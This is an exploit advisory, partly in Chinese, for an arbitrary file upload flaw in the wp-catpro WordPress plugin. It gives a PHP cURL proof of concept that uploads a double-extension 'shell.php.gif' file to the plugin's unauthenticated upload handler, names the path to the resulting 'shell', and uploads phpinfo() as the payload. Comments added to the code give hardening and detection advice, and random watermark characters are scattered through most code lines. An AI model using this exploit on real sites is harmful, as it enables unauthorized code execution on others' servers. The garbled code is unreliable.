WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------#
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Proof-of-concept request as posted in the writeup: a multipart POST to the
// plugin's swfupload handler. Several lines below carry forum watermark noise
// from the original post; they are left exactly as they appear, so read the
// statements and ignore the stray characters.
//
// Defensive notes (not part of the PoC):
//  - Validate the whole filename, not only the trailing extension. A name that
//    carries more than one extension should be rejected, or the stored file
//    should be renamed to a server-generated name with a fixed image extension.
//  - Require an authenticated, nonce-protected request before accepting an
//    upload; this PoC sends no cookie or token, so the handler appears to be
//    reachable without either.
//  - Serve the uploads directory with script execution disabled and, where
//    possible, store uploads outside the web root.
//  - Detection: POSTs to plugins/wp-catpro/js/swfupload/js/upload.php and files
//    with multiple extensions (e.g. *.php.*) appearing under
//    wp-content/uploads/catpro/ are both worth alerting on.
( U9 ]# P2 p1 W% y' z + g: g8 k: j$ ^- b4 Y* q$ ^ x7 r$ V
// Local file to send. Its name ends in ".gif", which the plugin's allowed
// extension list ("jpg", "gif", "png") quoted above accepts even though the
// name also contains ".php" — presumably only the final suffix is compared.
$uploadfile="zik.php.gif";' C( F5 J$ @! y2 H9 h( s2 o
// Target endpoint; "[ www.2cto.com ]" and "[path]" are placeholders in the writeup.
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php"); _4 Q4 O) v5 X; D' s6 Z& e
curl_setopt($ch, CURLOPT_POST, true);. N" `# P: i) R. {7 u
// Two POST fields: "Filedata" (the file body) and "folder" (destination path).
// The destination is supplied by the client here; a hardened handler would
// ignore any client-provided folder and write to a fixed, non-executable location.
curl_setopt($ch, CURLOPT_POSTFIELDS,, I- ^# q2 p5 f$ h4 k/ n) I
array('Filedata'=>"@$uploadfile",
- |$ U3 r7 H0 p m- }1 ?, U# P0 O'folder'=>'/wp-content/uploads/catpro/'));
* s9 r. p% B" B8 Xcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
~3 S9 V) L+ z. M! W n9 }$postResult = curl_exec($ch);* ?* n1 j$ i. }, c
curl_close($ch);4 H# [0 P9 e. k K' P! u
# C. w4 D6 N* F- u, E5 m$ B, n
// Echo the handler's response; the "random_name" below suggests the stored
// filename is generated server-side and is presumably learned from this output.
print "$postResult";
! V$ k }( }0 B f
& M& S- w" Q0 _6 X, N0 P2 ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif: o; B" q( ?# o5 S" C, J( Q
?>7 q, D- }9 y6 i3 n0 x
<?php
// Presumably the content of the file uploaded under the ".php.gif" name above.
// phpinfo() only demonstrates that the server executed the upload as PHP, which
// relies on the host mapping a multi-extension name to the PHP handler. Seeing
// phpinfo output (or any script execution) for a file under wp-content/uploads
// is itself an indicator worth alerting on: upload directories should never
// execute scripts.
" R7 P/ T1 w8 B$ s3 I! T/ Bphpinfo();
& E. i+ N2 d. c z& S?> |